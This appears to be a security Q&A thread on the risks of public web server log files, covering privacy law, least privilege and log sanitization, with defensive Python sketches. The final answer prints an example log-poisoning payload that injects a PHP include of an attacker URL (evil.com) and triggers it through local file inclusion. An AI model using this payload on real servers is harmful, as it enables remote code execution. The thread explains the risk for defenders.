44

Accessing web server log files via a URL has a certain appeal, as it provides easy access. But what are the security risks of allowing open access to log files?

Ola Eldøy
  • 19
    This might be a bit broad to answer, since it depends heavily on both what it logged, and what is considered sensitive by the company doing the logging. For example, a log of HTTP statuses other than 200 could be sensitive in some cases (shows potential flaws in a site), but doesn't contain anything directly sensitive. – Matthew Dec 06 '18 at 09:37
  • 9
    One security risk is that some inept developer decided to use GET requests for everything including the login page. – MonkeyZeus Dec 06 '18 at 14:33
  • 21
    Also, keep in mind that this may disclose what IP's have connected to your web server, which might violate local privacy laws. – Austin Hemmelgarn Dec 06 '18 at 20:05
  • 3
    The risks far outweigh the appeal on this one... one thing nobody's mentioned is not only can the stack trace show technologies in play, it also exposes the architecture of the system including sensitive spots such as login and authorization. – RandomUs1r Dec 07 '18 at 19:04
  • 3
    One of the biggest risks would be to expose data which you are not allowed to share with the general public. Think IP addresses and GDPR, for example. You need to provide a privacy statement along with a reason why you process that data and whatnot, blah blah blah. Now... you _publish_ that data accessible by anyone... I don't think this will work without attracting trouble. – Damon Dec 07 '18 at 19:29
  • What @AustinHemmelgarn and Damon said. Logs contain vast amounts of privacy-infringing data. – R.. GitHub STOP HELPING ICE Dec 10 '18 at 04:21
  • In my past experience as a java server developer, I have previously witnessed credit card details in server logs. In a large or growing corporation, there is no accounting for what junior developers may do. – Stewart Dec 10 '18 at 07:04

8 Answers

84

There are two distinct lines of defense here.

First, highly sensitive data (secrets, typically passwords) should never be logged to avoid compromise through logs.
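
As a rough illustration of that first line of defense, here is a minimal sketch of a Python `logging` filter that scrubs secret-looking `key=value` pairs before a record is written. The key names in `SECRET_PATTERN` and the `[REDACTED]` placeholder are assumptions made for this example, not a standard list, and a filter like this is only a safety net: it cannot catch secrets that do not match the pattern.

```python
import logging
import re

# Hypothetical pattern: key=value pairs whose key looks like a secret.
SECRET_PATTERN = re.compile(r"(?i)\b(password|passwd|token|secret)=([^\s&]+)")


def redact(text: str) -> str:
    """Replace the value of any secret-looking key=value pair with a placeholder."""
    return SECRET_PATTERN.sub(lambda m: f"{m.group(1)}=[REDACTED]", text)


class RedactingFilter(logging.Filter):
    """Logging filter that scrubs secret-looking values from every record."""

    def filter(self, record: logging.LogRecord) -> bool:
        # Format the message first so that values passed as args are covered too.
        record.msg = redact(record.getMessage())
        record.args = ()  # the message is already fully formatted
        return True  # never drop the record, only rewrite it
```

It could be attached with something like `handler.addFilter(RedactingFilter())` on each handler that writes to disk.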

But the more an attacker knows about a system, the higher the risk that they can build or use a targeted attack. For example, software versions are not highly sensitive and can reasonably appear in a log, but they can help in choosing an attack vector.

So the second line of defense is that anyone who does not need access to the logs should not be able to read them. That is a direct application of the principle of least privilege.

It is common to provide log access to the dev/maintenance team, but you should evaluate the risk/gain ratio in light of your access security tools. The most secure system is the one that cannot be accessed by any user, but its usability is very low too...

Serge Ballesta
  • 9
    I thought "compromission" was a typo, but TIL its a real word meaning "the act or action of jeopardizing (as one's moral or ethical principles)" – Criggie Dec 06 '18 at 23:01
  • 4
    While highly sensitive data should never be logged, it does happen by error sometimes. That should obviously be addressed if it's happening on your system, but the consequences of that mistake are far greater if the logs are publicly exposed. – Zach Lipton Dec 06 '18 at 23:03
  • 9
    Any logfile that logs user names risks displaying passwords too if a user assumes they are being prompted for their password when in fact it has reverted to the user name prompt. Every now and then I realised I had done just that and wondered if my password had been logged. – PJTraill Dec 07 '18 at 00:11
  • 2
    Your fourth paragraph is quite important and I think clarifies how some people misunderstand security. Just because you want to "avoid security by obscurity" doesn't mean you should advertise potential attack vectors. – corsiKa Dec 07 '18 at 03:10
  • 1
    @Criggie: it was indeed a typo (English is not my first language). Would *compromise* be better here? – Serge Ballesta Dec 07 '18 at 07:38
  • Sadly, many log files (Microsoft logon I'm looking at you!) fail to hide sensitive information because their fundamental design doesn't consider user input error. Suppose you accidentally type (Windows login screen) your username, then the keyboard fails to send , you type your password: the log file now has name+password in plaintext. Security holes abound because designers don't think. ninja'd by @Hugh Meyers' comment on next answer. – Carl Witthoft Dec 07 '18 at 13:54
  • 1
    Though highly sensitive data shouldn't be in logs, it does sometimes happen anyway. For example I have in the past implemented integration between two web applications. Due to design choices in the web application I wasn't responsible for we had to receive secrets from that system through URL parameters which would naturally end up in our web server logs. More common examples involve one time secrets being used in URLs for certain validation purposes. There is also the possibility of logs containing PII. – kasperd Dec 07 '18 at 16:15
29

Access to raw log data should be restricted to authorized users.

The simple reason is that, even if under normal operating conditions your applications do not log any data too sensitive to expose (and opinions and regulations on what exactly that is may differ), there will almost certainly come a time when your logs do contain sensitive data:

  • Unless you're extremely familiar with your applications, you don't know in advance what details will get logged when the application throws errors or exceptions.
    Most applications are designed to restrict the amount of detail in error messages they present to end users but will log (much) more detail in their logs to help admins and developers troubleshoot the cause of those errors and exceptions.

  • You may need to increase the log verbosity for troubleshooting to such a level that logs will contain sensitive details that would normally get suppressed.

  • As people commented: users entering passwords in login-name fields, developers using the GET method rather than POST, and a myriad of similar human errors may result in otherwise innocuous fields in log events getting "polluted" with sensitive data.


There are products, such as Splunk, Kibana and similar, that allow you to grant authenticated users web-based access and to set ACLs that limit each user to aggregated reports only, to sanitized/filtered log data, and/or to all raw log events.

And although access to raw log data should be restricted, you can still decide to publish more widely either a sanitized subset of your logs or the reports that you generate from them, for example a usage report and visitor statistics rather than the raw access log.
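
To make the idea of a sanitized subset concrete, here is a minimal sketch that rewrites one access-log line before publication. It assumes Common Log Format lines with an IPv4 client address; the regular expression and the `sanitize_line` helper are illustrative names for this example, not part of any product mentioned above. The sketch zeroes the last octet of the address, drops the ident and user fields, and strips the query string, which is where GET parameters would otherwise leak.

```python
import re

# Assumes Common Log Format with an IPv4 client address, e.g.
# 203.0.113.7 - - [06/Dec/2018:09:37:00 +0000] "GET /a?b=c HTTP/1.1" 200 512
LINE = re.compile(
    r'^(\d+\.\d+\.\d+)\.\d+ (\S+) (\S+) (\[[^\]]+\]) "(\S+) (\S+) (\S+)" (\d{3}) (\S+)$'
)


def sanitize_line(line: str):
    """Return a publishable version of one log line, or None if it cannot be parsed."""
    m = LINE.match(line.strip())
    if m is None:
        return None  # drop anything unparseable rather than risk leaking it
    net, _ident, _user, ts, method, target, proto, status, size = m.groups()
    path = target.split("?", 1)[0]  # discard the query string entirely
    return f'{net}.0 - - {ts} "{method} {path} {proto}" {status} {size}'
```

Whether a truncated address still counts as personal data is a legal question that this sketch does not settle.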

HBruijn
  • 26
    An additional example: I have sometimes typed my password into the wrong field. I'm probably not the only person ever to do that. Thus sensitive information can wind up in a place that would not normally be sanitized. +1 for some good advice. – Hugh Meyers Dec 06 '18 at 14:11
  • 3
    @HughMeyers I'm constantly surprised by how many users put their credit card number in cardholder name fields. – user2752467 Dec 06 '18 at 19:47
  • 2
    @JustinLardinois I’ve never done that. What trips me up are the screens that usually remember your login name and just ask for your password. Every so often they forget my login name and prompt for it. If I’m on autopilot, I just type my password and hit enter and the form gets submitted. Bad UI design but I kick myself for being careless. Every so often form auto-fillers get something wrong as well so I never use them. – Hugh Meyers Dec 06 '18 at 19:55
  • @JustinLardinois not surprising - different sites have the cardholder name and the card number *swapped*. And the two fields are usually of similar size. So you might default to entering data in the wrong field on a screen with a different layout. Throw in the fact that when entering this information people are focused on their *card* not the screen and once they finish the data entry they are interested if the information they just entered is *correct*, rather than *is it in the correct field*. Plenty of such screens are badly designed aside from the inherent problems, too. – VLAZ Dec 07 '18 at 08:17
  • @vlaz I agree with you that card entry interfaces are often poorly designed. But I wonder what the user is thinking when they put their card number in both fields, which is the only way the transaction could have their number in the name field and still go through. – user2752467 Dec 07 '18 at 21:37
  • @JustinLardinois probably something along the lines of "It let me proceed, so I won't bother correcting it". I'd chalk it up to bad design again - ideally it would prevent you (probably softly) from having the same data in both fields. The form could also be a lot clearer about which field is which - for example, one form I saw recently had a picture of a blank card next to the form and when you had the focus on a field, it highlighted the part of the card which would have that information. Once you entered information, it would put it over the image of the card, too. – VLAZ Dec 08 '18 at 10:25
19

There are several angles to this:

1) By not hiding logs, you expose your infrastructure.

2) The EU has the GDPR. Exposing IPs, names, e-mails or anything personal is prohibited (and is at the very least immoral and bad behaviour): gdpr-info.eu/art-32-gdpr

If you need to show the logged data to a third party, or simply want easy access, use a dedicated tool. In my office it's Graylog, for example. You can easily harvest the logs, store them and control access to them.

Ondřej Kolín
  • 1
    "unmoral" -> "immoral". It's too short of a correction, and I can't edit the post. – VLAZ Dec 07 '18 at 08:19
  • 2
    You may want to reference article 32 of the GDPR, which requires you to implement appropriate organizational and technical measures to safeguard personal data. https://gdpr-info.eu/art-32-gdpr/ – Johannes Brodwall Dec 10 '18 at 20:07
8

The vulnerabilities that may arise from the types of information written to log files are enumerated as CWE-532 in the Common Weakness Enumeration database.

Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.

The issue of protected, personally-identifiable information is also quite relevant, as addressed in @KOLEGA's answer above.

7

Even if you don't intentionally log sensitive information, sometimes it can be logged inadvertently.

For instance, suppose you log the username of failed logins. Sometimes people accidentally type their password into the username field, and this will then be logged.

It's best to treat logs as potentially containing information that should be protected, even if you don't normally consider it sensitive.
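
One possible mitigation, sketched below under stated assumptions, is to log a keyed hash of whatever was typed into the username field instead of the raw text. The `LOG_HMAC_KEY` value, the `username_token` and `log_failed_login` helpers, and the 16-character truncation are all hypothetical choices for this example. Repeated failures for the same input can still be correlated, but a mistyped password does not appear in plaintext. Anyone holding the key could still brute-force weak values, so the key would need the same protection as any other secret.

```python
import hashlib
import hmac
import logging

logger = logging.getLogger("auth")

# Hypothetical key; in practice it would come from a secret store, not source code.
LOG_HMAC_KEY = b"example-key-for-illustration-only"


def username_token(submitted: str) -> str:
    """Return a short keyed hash that stands in for the submitted username."""
    digest = hmac.new(LOG_HMAC_KEY, submitted.encode("utf-8"), hashlib.sha256)
    return digest.hexdigest()[:16]


def log_failed_login(submitted: str, client_ip: str) -> None:
    """Record a failed login without writing the raw submitted text to the log."""
    logger.warning(
        "failed login user_token=%s ip=%s", username_token(submitted), client_ip
    )
```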

Barmar
4

Log files should be kept in a safe location by default. They can contain IP addresses, emails, and legally protected information, so my recommendation is to always keep log files in a safe location. On the other hand, in some cases these log files are used for forensic purposes, and you should protect them against modification if possible; this depends a bit on your system.
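
One way to make modification at least detectable is a hash chain, where each entry's digest also covers the previous digest. The sketch below is only an illustration of that idea: the `chain_entries` and `verify_chain` helpers and the all-zero `GENESIS` value are assumptions for this example. An attacker with write access could recompute the whole chain, so the most recent digest would have to be kept somewhere they cannot reach.

```python
import hashlib

GENESIS = "0" * 64  # assumed starting value for the chain


def chain_entries(lines):
    """Pair each log line with a SHA-256 digest covering it and the previous digest."""
    prev = GENESIS
    out = []
    for line in lines:
        digest = hashlib.sha256((prev + line).encode("utf-8")).hexdigest()
        out.append((line, digest))
        prev = digest
    return out


def verify_chain(entries):
    """Return True only if every stored digest matches a recomputation."""
    prev = GENESIS
    for line, digest in entries:
        expected = hashlib.sha256((prev + line).encode("utf-8")).hexdigest()
        if expected != digest:
            return False
        prev = digest
    return True
```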

camp0
3

Like Serge Ballesta said, sensitive information (usernames, passwords, etc.) should really never be put in a log file.

The main security concern with publicly accessible log files is that an attacker can gain information about your system, especially if you are using publicly available software (not developed uniquely for that system).

If I'm attempting to gain access to your system, one thing I might check FIRST is your log files. If I'm able to discern what software your system is running, and even more importantly, what VERSION of that software is being used, I can narrow down my search for exploits drastically. Maybe you haven't updated your software to the most recent version, there is a bug in the old version that allows me to use SQL injection, and there is a line in your log that states the current software version being used.

It's about the same level of security risk as using open source code. It just makes it a tad easier for an attacker to find exploits. Food for thought.

ethayng
2

Some good answers here - but not complete.

Yes, your log files may potentially contain sensitive data, hence that data should be explicitly restricted to those users who are authorized to access it. Sadly, my experience is that most organizations which implement this kind of control grossly misjudge the number of people who should be authorized.

But another important point is that your users control a lot of the data which subsequently appears in the log files. Depending on the system architecture of your application, this can provide a mechanism for leveraging a local file inclusion vulnerability into a full exploit. Consider:

 GET /nonesuch%3C%3Finclude%20'http://evil.com/attack';%3F%3E
 GET /vulnerable.php?file=/var/log/httpd/error_log

This may be mitigated by how your webserver handles the encoding of the request on input and when writing to log files (but is it completely watertight?). If you allow the webserver to access the log file location directly via a URL, then the escalation mechanism is slightly different.

(Note that in the example above, if it is possible to invoke a remote include, then that will likely be possible across all the code, hence persisting the exploit in the log file is redundant. This is just for illustration purposes; more complex exploits can be written.)
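
For logs written by the application itself, one hedged sketch of the mitigation is to neutralize user-controlled values before they reach the log, so that neither markup such as `<?` nor embedded newlines survive. The allowlist in `_UNSAFE` and the `neutralize` helper are assumptions for this example and would need tuning for real traffic; this says nothing about how any particular web server encodes its own access or error logs.

```python
import re

# Anything outside this conservative allowlist is written as \xNN escapes.
_UNSAFE = re.compile(r"[^A-Za-z0-9 ._~/:=&%+,@-]")


def neutralize(value: str) -> str:
    """Escape characters that could be interpreted as code or forge log lines."""
    return _UNSAFE.sub(
        lambda m: "".join(f"\\x{b:02x}" for b in m.group().encode("utf-8")),
        value,
    )
```

Because the backslash is itself outside the allowlist, it is escaped as well, so the output stays unambiguous.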

symcbean